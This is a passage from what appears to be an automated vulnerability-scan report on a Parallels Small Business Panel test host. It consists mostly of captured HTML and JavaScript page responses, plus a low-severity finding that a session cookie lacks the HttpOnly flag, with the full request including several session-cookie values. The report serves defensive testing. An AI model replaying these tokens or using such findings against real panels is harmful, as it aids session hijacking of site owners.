       form.filterValue.selectedIndex = 0;
   }
   form.elements[tab+'searchString'].value='';
   form.submit();
}
function pagedListSearchItems(tab) {
   var formName = 'SB_WizardForm';
   var form = document.forms[formName];
   form.tab.value = tab;
   form.pageNum.value = 1;
   form.action = '/Wizard/Edit/Modules/ImageGallery/Category/Add';

   form.submit();
}
function pagedListChangeFilter(tab) {
   var formName = 'SB_WizardForm';
   var form = document.forms[formName];
   form.tab.value = tab;
   form.pageNum.value = 1;
   form.action = '/Wizard/Edit/Modules/ImageGallery/Category/Add';

   form.submit();
}
</script><table cellpadding="0" cellspacing="0" border="0" class="list-show-container"><tr>
<td class="list-show-search-input-area"><input type="text" size="25" maxlength="255" class="sb-input" name="categoriessearchString"></td>
<td class="list-show-search-tool-area"><table cellpadding="0" cellspacing="0" border="0" type="button" style="cursor:pointer;" class="link-button-container" onclick="pagedListSearchItems('categories');"><tr>
<td class="link-button-image-area"><img src="/skins/WinXPReloadedCompact/icons/search.png" alt=""></td>
<td class="link-button-text-area"><span style="text-decoration: underline;">Search</span></td>
</tr></table></td>
<td class="list-show-showall-tool-area"><table cellpadding="0" cellspacing="0" border="0" type="button" name="ImageButtonShowAll" style="cursor:pointer;" class="link-button-container" onclick="pagedListShowAll('categories');"><tr>
<td class="link-button-image-area"><img src="/skins/WinXPReloadedCompact/icons/showall.png" alt=""></td>
<td class="link-button-text-area"><span style="text-decoration: underline;">Show All</span></td>
</tr></table></td>
</tr></table>
</td>
</tr></table>
<script language="javascript">
function pagedListGotoPage(tab, pageNum) {
   var formName = 'SB_WizardForm';
   var form = document.forms[formName];
   form.tab.value = tab;
   form.pageNum.value = pageNum;
   form.submit();
}
function pagedListSetPageSize(tab, pageSize) {
   var formName = 'SB_WizardForm';
   var form = document.forms[formName];
   form.tab.value = tab;
   form.pageNum.value = 1;
   form.pageSize.value = pageSize;
   form.submit();
}
</script><table width="100%" cellspacing="0" cellpadding="0" border="0" class="list-pager-container"><tr>
<td class="list-pager-total-area">2..records total</td>
<td class="list-pager-go-area"></td>
<td class="list-pager-numbers-area">Number of entries per page:..
       <a href="javascript:pagedListSetPageSize('categories',5);">5</a>..
       <strong>10</strong>..
       <a href="javascript:pagedListSetPageSize('categories',25);">25</a>..
       <a href="javascript:pagedListSetPageSize('categories',100);">100</a>
</td>
</tr></table>
<div class="scroll-table"><table cellspacing="0" cellpadding="0" border="0" class="list-table">
<tr class="fixed">
<th style="width:1%;"><div><input type="checkbox" name="globalCheck" onclick="setCheckboxStatus(this.checked);" class="check"></div></th>
<th style="width:1%;"><div>P</div></th>
<th><div>Name</div></th>
<th><div>Number of images</div></th>
<th style="width:1%;"><div><span></span></div></th>
<th style="width:1%;"><div><span></span></div></th>
<th style="width:1%;text-align:center;" scope="col"><div>Edit</div></th>
</tr>
<tr class="list-table-row">
<td style="width:1%;"><input type="checkbox" name="objectIds[]" class="check" value="1"></td>
<td></td>
<td style="text-align:;">Category1</td>
<td style="text-align:;">0</td>
<td style="width:1%; text-align:center;"></td>
<td style="width:1%; text-align:center;"><a href="#" onclick="
                           var action    = document.getElementById('viewAction');
                           var form    = document.forms['SB_WizardForm'];
                           form.action = action.value+'/Modules/ImageGallery/Category/Down?id=1';
                       
                           self.sbApplyChangesObject.registerForcedSaving();
                           sbNavigationObject.go();
                       "><img style="border-width:0px;width:16px;height:16px" src="/skins/WinXPReloadedCompact/images/sequence-down.gif"></a></td>
<td style="width:1%; text-align:center;"><a href="#" onclick="
                       self.sbApplyChangesObject.registerForcedSaving();
                       sbNavigationObject.go('/Wizard/Edit/Modules/ImageGallery/Category/Edit?id=1');
                   "><img style="border-width:0px;width:16px;height:16px" src="/skins/WinXPReloadedCompact/icons/editsiteinwizard.png"></a></td>
</tr>
<tr class="list-table-row-alter">
<td style="width:1%;"><input type="checkbox" name="objectIds[]" class="check" value="2"></td>
<td></td>
<td style="text-align:;">Category2</td>
<td style="text-align:;">0</td>
<td style="width:1%; text-align:center;"><a href="#" onclick="
                           var action    = document.getElementById('viewAction');
                           var form    = document.forms['SB_WizardForm'];
                           form.action = action.value+'/Modules/ImageGallery/Category/Up?id=2';
                       
                           self.sbApplyChangesObject.registerForcedSaving();
                           sbNavigationObject.go();
                       "><img style="border-width:0px;width:16px;height:16px" src="/skins/WinXPReloadedCompact/images/sequence-up.gif"></a></td>
<td style="width:1%; text-align:center;"></td>
<td style="width:1%; text-align:center;"><a href="#" onclick="
                       self.sbApplyChangesObject.registerForcedSaving();
                       sbNavigationObject.go('/Wizard/Edit/Modules/ImageGallery/Category/Edit?id=2');
                   "><img style="border-width:0px;width:16px;height:16px" src="/skins/WinXPReloadedCompact/icons/editsiteinwizard.png"></a></td>
</tr>
</table></div>
<script language="javascript">
function pagedListGotoPage(tab, pageNum) {
   var formName = 'SB_WizardForm';
   var form = document.forms[formName];
   form.tab.value = tab;
   form.pageNum.value = pageNum;
   form.submit();
}
function pagedListSetPageSize(tab, pageSize) {
   var formName = 'SB_WizardForm';
   var form = document.forms[formName];
   form.tab.value = tab;
   form.pageNum.value = 1;
   form.pageSize.value = pageSize;
   form.submit();
}
</script><table width="100%" cellspacing="0" cellpadding="0" border="0" class="list-pager-container"><tr>
<td class="list-pager-total-area">2..records total</td>
<td class="list-pager-go-area"></td>
<td class="list-pager-numbers-area">Number of entries per page:..
       <a href="javascript:pagedListSetPageSize('categories',5);">5</a>..
       <strong>10</strong>..
       <a href="javascript:pagedListSetPageSize('categories',25);">25</a>..
       <a href="javascript:pagedListSetPageSize('categories',100);">100</a>
</td>
</tr></table>
<script type="text/javascript" language="javascript">
                       observeCheckboxesClick('Ids[]',
                           'Top'
                       );
                       observeListRowsHighlight();
                   </script>
</div>
</fieldset>
</div>
<div style="display:none;" id="settingsContent"></div>
</td></tr>
<tr class="sb-formtablefooter"><th style="width: 100%;">..</th></tr>
</table>
<script type="text/javascript">imgPath='/skins/WinXPReloadedCompact/images/';</script><script type="text/javascript" src="/js/tabpanel.js?5.0.0.2009110318"></script><script type="text/javascript">sb_panel = new TabPanel();
           sb_panel.setupAllPages();
       </script>
</td></tr></table>
</td>
</tr></table></td></tr></table>
</td></tr>
<tr id="TRFooter"><td colspan="2"><table cellpadding="0" cellspacing="0" border="0" width="100%" class="sb-footer-container"><tr><td class="sb-footer"><table cellpadding="0" cellspacing="0" border="0" style="width: 100%; height: 100%;"><tr>
<td><table border="0" cellpadding="0" cellspacing="5" style="height: 100%; padding: 5px 0;"><tr><td class="sb-footer-text" style="white-space: nowrap;padding-left: 15px;">
                                       .... Copyright 2004-2009 Parallels All Rights Reserved.</td></tr></table></td>
<td align="right" style="padding-right: 10px;"><table cellpadding="0" cellspacing="0"><tr>
<td><table cellpadding="0" cellspacing="0" border="0" type="button" value="Back" style="cursor:pointer;" onclick="return sbNavigationObject.go('/Wizard/Pages');"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/go_back_l.gif"></td>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/go_bg.gif);padding-left:15px;padding-right:5px;"><img src="/skins/WinXPReloadedCompact/images/go_back_bullet.gif"></td>
<td align="center" class="sb-go-text" style="padding: 0 15px 0 5px; width:40px; background-image:url(/skins/WinXPReloadedCompact/images/go_bg.gif);">Back</td>
<td><img src="/skins/WinXPReloadedCompact/images/go_back_r.gif"></td>
</tr></table></td>
<td><table cellpadding="0" cellspacing="0" border="0" type="button" value="Preview" style="cursor: pointer;" onclick="sbNavigationObject.setViewParam('preview','show');sbNavigationObject.go('/Wizard/Edit/Modules/ImageGallery/Category/Add');sbNavigationObject.unsetViewParam('preview');"><tr>
<td style="width:0px;"></td>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/go_bg.gif);padding-left:15px;padding-right:5px;"><img src="/skins/WinXPReloadedCompact/images/go_preview_bullet.gif"></td>
<td align="center" class="sb-go-text" style="padding: 0 15px 0 5px; width:40px; background-image:url(/skins/WinXPReloadedCompact/images/go_bg.gif);">Preview</td>
</tr></table></td>
<td><table cellpadding="0" cellspacing="0" border="0" value="Forward" style="cursor:pointer;" onclick="return sbNavigationObject.go('/Wizard/Publish');"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/go_next_l.gif" border="0"></td>
<td background="/skins/WinXPReloadedCompact/images/go_bg.gif" style="padding-left:15px;padding-right:5px;"><img src="/skins/WinXPReloadedCompact/images/go_next_bullet.gif" border="0"></td>
<td align="center" class="sb-go-text" style="padding: 0 15px 0 5px; width:40px; background-image:url(/skins/WinXPReloadedCompact/images/go_bg.gif);">Next</td>
<td><img src="/skins/WinXPReloadedCompact/images/go_next_r.gif" border="0"></td>
</tr></table></td>
</tr></table></td>
</tr></table></td></tr></table></td></tr>
</table>
</form>
</body>
</html>

3.14. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery/Category/Edit  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:   /Wizard/Edit/Modules/ImageGallery/Category/Edit

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Wizard/Edit/Modules/ImageGallery/Category/Edit?id=1 HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 04:59:15 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<link href="/skins/common.css?5.0.0.2009110318" type="text/css" rel="stylesheet">
<link href="/skins/WinXPReloadedCompact/style.css?5.0.0.2009110318" type="text/css" rel="stylesheet">
<link href="/skins/style_ext.css?5.0.0.2009110318" type="text/css" rel="stylesheet">
<link rel="shortcut icon" href="/favicon.ico?5.0.0.2009110318">
<script type="text/javascript" src="/js/externals/prototype.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/externals/scriptaculous/scriptaculous.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/Sb.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/Sb/Console.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/util.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/preloader.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/Sb/Cookie.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/common.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/validator.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/SbAjaxRequest.js?5.0.0.2009110318"></script><style type="text/css">img{ behavior:url('/images/pngbehavior.htc?5.0.0.2009110318'); }</style>
<title>Edit -
       Parallels Small Business Panel</title>
</head>
<body onload="ProcessOnloadActions();">
<script type="text/javascript">
                   if ('1' == '') {
                       Sb.Console.enable();

                       
                   }
                                   
                   Sb.Cookie.set('testCookie', 'test', '', '/');

                   if ('test' != Sb.Cookie.get('testCookie')) {
                       document.location.href = "/NoCookies";
                   }

                   // define global variables
                   sbSkinPath = '/skins/WinXPReloadedCompact';
                   sbBrowserEngine = 'MSIE';
                   sbBaseUrl = '';
                   sbVersion = '5.0.0';
                   sbBuild = '2009110318';
               </script><script src="/js/locale.js?5.0.0.2009110318" type="text/javascript"></script><script type="text/javascript" language="javascript">
               SbAppendLocaleKey('HIDE-SITE-MAP', 'Hide Site Map');
           
               SbAppendLocaleKey('SHOW-SITE-MAP', 'Show Site Map');
           
               SbAppendLocaleKey('EMPTY-PAGE-TITLE', 'Please provide the page title.');
           
               SbAppendLocaleKey('EMPTY-PAGE-FILE-NAME', 'Please provide a page file name.');
           
               SbAppendLocaleKey('INVALID-PAGE-FILE-NAME', 'Page file name can contain only Latin characters, digits, dashes, and underscores.');
           
               SbAppendLocaleKey('DUPLICATE-PAGE-FILE-NAME', 'Page file name must be unique within each site structure. Also, you cannot name a page \'index\' because it is a reserved name.');
           
               SbAppendLocaleKey('SELECT-FOR-DELETE', 'Please select at least one element.');
           
               SbAppendLocaleKey('SURE-TO-DELETE', 'Selected items will be deleted permanently. Continue?');
           
               SbAppendLocaleKey('EMPTY-CATEGORY-THUMB-WIDTH', 'Please provide a value for the Category image width parameter.');
           
               SbAppendLocaleKey('NOT-INT-CATEGORY-THUMB-WIDTH', 'Invalid value of the Category image width parameter. Please enter an integer number.');
           
               SbAppendLocaleKey('CATEGORY-MAX-THUMB-WIDTH', 'The maximum allowed value for the Category image width parameter is 2048 (px).');
           
               SbAppendLocaleKey('EMPTY-IMAGE-THUMB-WIDTH', 'Please provide a value for the Image thumb width parameter.');
           
               SbAppendLocaleKey('NOT-INT-IMAGE-THUMB-WIDTH', 'Invalid value of the Image thumb width parameter. It must be an integer number.');
           
               SbAppendLocaleKey('IMAGE-MAX-THUMB-WIDTH', 'The maximum allowed value for the Image thumb width parameter is 2048 (px).');
           
               SbAppendLocaleKey('EMPTY-IMAGE-THUMB-HEIGHT', 'Please provide a value for the Image thumb height parameter.');
           
               SbAppendLocaleKey('NOT-INT-IMAGE-THUMB-HEIGHT', 'Invalid value of the Image thumb height parameter. It must be an integer number.');
           
               SbAppendLocaleKey('IMAGE-MAX-HEIGHT-WIDTH', 'The maximum allowed value for the Image thumb height parameter is 1536 (px).');
           
               SbAppendLocaleKey('EMPTY-PREVIEW-THUMB-WIDTH', 'Please provide a value for the Preview thumb width parameter.');
           
               SbAppendLocaleKey('NOT-INT-PREVIEW-THUMB-WIDTH', 'Invalid value of the Preview thumb width parameter. It must be an integer number.');
           
               SbAppendLocaleKey('PREVIEW-MAX-WIDTH-WIDTH', 'The maximum allowed value for the Preview thumb width parameter is 2048 (px).');
           
               SbAppendLocaleKey('EMPTY-IMAGES-PER-PAGE', 'Please provide a value for the Images per page parameter.');
           
               SbAppendLocaleKey('NOT-INT-IMAGES-PER-PAGE', 'Invalid value of the of the Images per page parameter. It must be an integer number.');
           
               SbAppendLocaleKey('EMPTY-CATEGORY-NAME', 'Please provide a value for Name.');
           
               SbAppendLocaleKey('PREVIEW-POPUP-BLOCKED', 'The site preview window was blocked by your browser. To preview the site, please allow pop-up windows for this domain.');
           
               SbAppendLocaleKey('CONTENT-MODIFIED', 'Modified');
           
               SbAppendLocaleKey('AJAX-REQUEST-LOADING', 'Loading...');
           
               SbAppendLocaleKey('AJAX-REQUEST-WAIT', 'Please wait.');
           </script><div id="fullScreenDiv" style="position:absolute; background: #ffffff; filter:alpha(opacity=0); opacity: 0;"></div>
<div id="disablerDiv" style="display: none; filter:alpha(opacity=40); background-color: #FFFFFF; opacity: 0.4;"></div>
<table id="SB_loader_table" cellpadding="0" cellspacing="0" border="0" width="100%" height="100%" style="display:none;z-index:1098;position:absolute;"><tr><td id="SB_loader_td" style="filter:alpha(opacity=40);background-color:#ffffff;-moz-opacity:0.40;"></td></tr></table>
<div id="DIV_DESKTOP" style="width:1%;height:1%;display:none;text-align:center;position:absolute;left:0px;top:0px;z-index:1001;"></div>
<div id="loader" style="height:56px;width:320px;display:none;position:absolute;left:0px;top:0px;z-index:1100;"><table border="0" cellspacing="3" cellpadding="3" width="100%" height="100%" class="sb-preloader-table"><tr>
<td align="center" valign="middle" width="15%"><img id="ImagePreloader" src="/skins/WinXPReloadedCompact/images/loading.gif" style="border-width:0px;"></td>
<td align="left" valign="middle"><span id="LabelPreloader"><strong>Please wait.</strong><br><strong>Loading...</strong></span></td>
</tr></table></div>
<iframe src="/blank.html" id="SB_loader_iframe" name="SB_loader_iframe" frameborder="0" scrolling="no" style="border-width:0;display:none;z-index:1099;position:absolute;height:56px;width:320px;"></iframe><script type="text/javascript" language="javascript"><!--
               var sbPreloader = new SbPreloader();
               
                       sbPreloader.show();
                   
           //--></script><script type="text/javascript">
                   sb_status = null;
               </script><script type="text/javascript" language="javascript" src="/js/modal_form.js?5.0.0.2009110318"></script><div id="SbApplyChangesBackground" style="background-color:black; filter:alpha(opacity=15); opacity: 0.15; z-index:101; position:absolute; overflow:hidden; display:none;"></div>
<div id="SbApplyChanges" style="width:300px; height:145px; display:none;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;">
<tr><td style="height: 100%;"><table cellspacing="0" cellpadding="0" style="width:100%; height: 100%;"><tr>
<td style="width:100%; background-color:white; vertical-align:top;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;">
<tr><td style="cursor:pointer; user-select:none; -moz-user-select:none; border:solid 1px #E3E3E3; width: 100%;"><table cellspacing="0" cellpadding="2" border="0" class="sb-modalbox-header" style="width:100%; border-collapse:collapse;"><tr>
<td id="SbApplyChangesHeader" style="width:99%; white-space:nowrap; padding-left:6px;"><span id="SbApplyChangesTitle" class="sb-modalbox-header-text" style="padding-left:6px; vertical-align:middle;">Apply Changes</span></td>
<td align="right" style="width:1%; padding: 4px 4px 4px 6px;" onclick="sbApplyChangesObject.hide();"><img width="16" height="16" src="/skins/WinXPReloadedCompact/icons/close.png" alt="Close dialog" style="border-width:0px; display:inline; vertical-align:middle;"></td>
</tr></table></td></tr>
<tr><td style="vertical-align:top;"></td></tr>
<tr><td style="width:100%; height:100%;padding: 10px;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;"><tr><td valign="top"><table width="80%" cellspacing="0" cellpadding="0" border="0" align="center">
<tr><td colspan="3" style="padding-bottom:10px; padding-left:10px;"><table cellpadding="0" cellspacing="0" border="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/applychanges.gif" border="0"></td>
<td class="sb-text" style="padding-left:30px;">Apply changes?</td>
</tr></table></td></tr>
<tr>
<td align="center" width="33%" style="padding-right:15px;"><table align="center" onclick="return sbApplyChangesObject.yes(); return false;" style="cursor:pointer; width:70px;" border="0" cellpadding="0" cellspacing="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td class="sb-text" style="width:100%; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); white-space: nowrap;" align="center">Yes</td>
<td><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></td>
<td align="center" width="34%"><table align="center" onclick="return sbApplyChangesObject.no(); return false;" style="cursor:pointer; width:70px;" border="0" cellpadding="0" cellspacing="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td class="sb-text" style="width:100%; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); white-space: nowrap;" align="center">No</td>
<td><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></td>
<td align="center" width="33%" style="padding-left:15px;"><table align="center" onclick="sbApplyChangesObject.cancel(); return false;" style="cursor:pointer; width:70px;" border="0" cellpadding="0" cellspacing="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td class="sb-text" style="width:100%; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); white-space: nowrap;" align="center">Cancel</td>
<td><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></td>
</tr>
</table></td></tr></table></td></tr>
</table></td>
<td style="width: 10px; padding-top:10px; height:100%;"><div style="width:10px; height:100%; filter:alpha(opacity=25); background-color:black; opacity:0.25; display: table;"><span></span></div></td>
</tr></table></td></tr>
<tr><td style="padding-left:10px; height: 10px;"><div style="width:100%; height:10px; filter:alpha(opacity=25); background-color:black; opacity:0.25;"><span></span></div></td></tr>
</table></div>
<script type="text/javascript" language="javascript">
           SbInitModalForm('SbApplyChanges');
       </script><script type="text/javascript" language="javascript" src="/js/apply_changes.js?5.0.0.2009110318"></script><script type="text/javascript" language="javascript"><!--
               sbApplyChangesObject = new SB_ApplyChanges('SbApplyChanges');
           //--></script><script type="text/javascript" language="javascript" src="/js/modal_form.js?5.0.0.2009110318"></script><div id="StatusDetailedBackground" style="background-color:black; filter:alpha(opacity=15); opacity: 0.15; z-index:101; position:absolute; overflow:hidden; display:none;"></div>
<div id="StatusDetailed" style="width: 750px; height: 370px; display: none;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;">
<tr><td style="height: 100%;"><table cellspacing="0" cellpadding="0" style="width:100%; height: 100%;"><tr>
<td style="width:100%; background-color:white; vertical-align:top;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;">
<tr><td style="cursor:pointer; user-select:none; -moz-user-select:none; border:solid 1px #E3E3E3; width: 100%;"><table cellspacing="0" cellpadding="2" border="0" class="sb-modalbox-header" style="width:100%; border-collapse:collapse;"><tr>
<td id="StatusDetailedHeader" style="width:99%; white-space:nowrap; padding-left:6px;"><span id="StatusDetailedTitle" class="sb-modalbox-header-text" style="padding-left:6px; vertical-align:middle;">Detailed status messages</span></td>
<td align="right" style="width:1%; padding: 4px 4px 4px 6px;" onclick="sb_status.hideDetails();return false;"><img width="16" height="16" src="/skins/WinXPReloadedCompact/icons/close.png" alt="" style="border-width:0px; display:inline; vertical-align:middle;"></td>
</tr></table></td></tr>
<tr><td style="vertical-align:top;"></td></tr>
<tr><td style="width:100%; height:100%;padding: 10px;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;"><tr><td valign="top"><div>
<div style="margin-bottom: 7px;"><table cellspacing="1" border="0" style="width: 720px;" align="center"><tr>
<td><table cellspacing="0" cellpadding="0" border="0" style="border-collapse: collapse;"><tr>
<td valign="middle" class="sb-text" style="padding-right: 5px;">View</td>
<td valign="middle" style="padding-right: 5px;"><select class="sb-text" onchange="sb_status.filterDetails(this.value)"><option value="0">All messages</option>
<option value="1">Information</option>
<option value="2">Errors</option>
<option value="3">Warnings</option></select></td>
</tr></table></td>
<td align="right"><table align="right" onclick="sb_status.clearDetails(); return false;" style="cursor:pointer; width:70px;" border="0" cellpadding="0" cellspacing="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td class="sb-text" style="width:100%; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); white-space: nowrap;" align="center">Clear</td>
<td><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></td>
</tr></table></div>
<div style="height: 180px; border-style: solid; border-width: 0px; width: 100%; overflow-y: auto; overflow-x: auto; overflow: auto; float: left;"><table cellspacing="1" border="0" style="width: 100%;" align="center" id="StatusDetailedMessages">
<tr class="sb-gridview-header" align="left" style="height: 24px; white-space: nowrap;">
<th style="padding-left: 4px; padding-right: 4px; text-align: left; width: 15px;" scope="col">#</th>
<th style="padding-left: 4px; padding-right: 4px; text-align: center; width: 25px;" scope="col">S</th>
<th style="padding-left: 4px; padding-right: 4px;" scope="col">Message</th>
</tr>
<tr class="0" style="display: none;">
<td style="padding-left: 4px; padding-right: 4px; text-align: left; width: 15px;" class="sb-gridtext">..</td>
<td style="padding-left: 4px; padding-right: 4px; text-align: center; width: 25px;" class="sb-gridtext">..</td>
<td style="padding-left: 4px; padding-right: 4px;" class="sb-gridtext">..</td>
</tr>
<tr class="1" style="display: none;">
<td style="padding-left: 4px; padding-right: 4px; text-align: left; font-wight: bold; width: 15px;" class="sb-gridtext">..</td>
<td style="padding-left: 4px; padding-right: 4px; text-align: center; width: 25px;" class="sb-gridtext">..</td>
<td style="padding-left: 4px; padding-right: 4px;" class="sb-gridtext">..</td>
</tr>
</table></div>
<div style="padding-top: 7px; width: 100%;"><table align="right" onclick="sb_status.hideDetails();return false; return false;" style="cursor:pointer; width:70px;" border="0" cellpadding="0" cellspacing="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td class="sb-text" style="width:100%; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); white-space: nowrap;" align="center">Close</td>
<td><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></div>
</div></td></tr></table></td></tr>
</table></td>
<td style="width: 10px; padding-top:10px; height:100%;"><div style="width:10px; height:100%; filter:alpha(opacity=25); background-color:black; opacity:0.25; display: table;"><span></span></div></td>
</tr></table></td></tr>
<tr><td style="padding-left:10px; height: 10px;"><div style="width:100%; height:10px; filter:alpha(opacity=25); background-color:black; opacity:0.25;"><span></span></div></td></tr>
</table></div>
<script type="text/javascript" language="javascript">
           SbInitModalForm('StatusDetailed');
       </script><script type="text/javascript" language="javascript" src="/js/wizard.js?5.0.0.2009110318"></script><script type="text/javascript" language="javascript" src="/js/navigation.js?5.0.0.2009110318"></script><script type="text/javascript" language="javascript">
           var baseUrl='';
           var sbNavigationObject;
           sbNavigationObject = new SB_Navigation('SB_WizardForm', '/Wizard/Edit/Modules/ImageGallery?tab=categories');
           </script><form name="SB_WizardForm" method="post" enctype="multipart/form-data" onsubmit="return wizardFormSubmit();" action="/Wizard/Edit/Modules/ImageGallery/Category/Update">
<script type="text/javascript" language="javascript" src="/js/modal_form.js?5.0.0.2009110318"></script><div id="modalFormBackground" style="background-color:black; filter:alpha(opacity=15); opacity: 0.15; z-index:101; position:absolute; overflow:hidden; display:none;"></div>
<div id="modalForm" style="width: 650px; height: 420px;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;">
<tr><td style="height: 100%;"><table cellspacing="0" cellpadding="0" style="width:100%; height: 100%;"><tr>
<td style="width:100%; background-color:white; vertical-align:top;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;">
<tr><td style="cursor:pointer; user-select:none; -moz-user-select:none; border:solid 1px #E3E3E3; width: 100%;"><table cellspacing="0" cellpadding="2" border="0" class="sb-modalbox-header" style="width:100%; border-collapse:collapse;"><tr>
<td id="modalFormHeader" style="width:99%; white-space:nowrap; padding-left:6px;"><span id="modalFormTitle" class="sb-modalbox-header-text" style="padding-left:6px; vertical-align:middle;">Edit Category</span></td>
<td align="right" style="width:1%; padding: 4px 4px 4px 6px;" onclick="sbNavigationObject.go();"><img width="16" height="16" src="/skins/WinXPReloadedCompact/icons/close.png" alt="" style="border-width:0px; display:inline; vertical-align:middle;"></td>
</tr></table></td></tr>
<tr><td style="vertical-align:top;"></td></tr>
<tr><td style="width:100%; height:100%;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;"><tr><td valign="top">
<input type="hidden" name="categoryTab" value="main"><input type="hidden" name="id" value="1"><table class="sb-formtable" cellpadding="0" cellspacing="0" width="100%" border="0">
<tr class="sb-formtableheader"><th valign="bottom" align="left" class="sb-formtableheader-th" style="width: 100%;"><table style="width:100%;" cellpadding="0" cellspacing="0" border="0" class="sb-formtable"><tr><td valign="top" style="width:100%;"><table border="0" cellspacing="0" cellpadding="0"><tr>
<td><table border="0" cellspacing="0" cellpadding="0" style="cursor:default;width:10px; height: 21px;" class="TabLabelSelectedStyle" id="main" onclick="javascript:imageCategoryToogle('sb_panel_1', this);"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/tabLeftOn.gif" alt="" id="main_IL"></td>
<td class="sb-button-tabs-text" style="white-space:nowrap;width:100%;background-image:url(/skins/WinXPReloadedCompact/images/tabMiddleOn.gif);background-repeat:repeat-x scroll 0px; padding-left: 5px; padding-right: 5px;" id="main_T">Main Properties</td>
<td><img src="/skins/WinXPReloadedCompact/images/tabRightOn.gif" id="main_IR" alt=""></td>
</tr></table></td>
<td><table border="0" cellspacing="0" cellpadding="0" style="cursor:pointer;width:10px;height: 21px;" class="TabLabelDefaultStyle" id="description" onclick="javascript:imageCategoryToogle('sb_panel_1', this);"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/tabLeftOff.gif" alt="" id="description_IL"></td>
<td class="sb-button-tabs-text" style="white-space:nowrap;width:100%;background-image:url(/skins/WinXPReloadedCompact/images/tabMiddleOff.gif);background-repeat:repeat-x scroll 0px; padding-left: 5px; padding-right: 5px;" id="description_T">Description</td>
<td><img src="/skins/WinXPReloadedCompact/images/tabRightOff.gif" id="description_IR" alt=""></td>
</tr></table></td>
</tr></table></td></tr></table></th></tr>
<tr><td style="padding: 10px;" class="sb-page">
<div style="display:block;" id="mainContent">
<script type="text/javascript" src="/modules/ImageGallery/js/validate.js?5.0.0.2009110318"></script><table cellpadding="0" cellspacing="0" border="0" class="control-title-input">
<tr>
<td class="title-block">
<label class="name" for="name">Name</label><span id="name_asterix" class="sb-asterix" style="display: none;">
               ..*
           </span>
</td>
<td class="input-block"><input type="text" size="25" maxlength="50" class="sb-input" id="name" name="name" onblur="showAsterix(this.id);" value="Category1"></td>
<td></td>
<td></td>
</tr>
<tr>
<td class="title-block"><label class="name">Current image</label></td>
<td class="input-block">
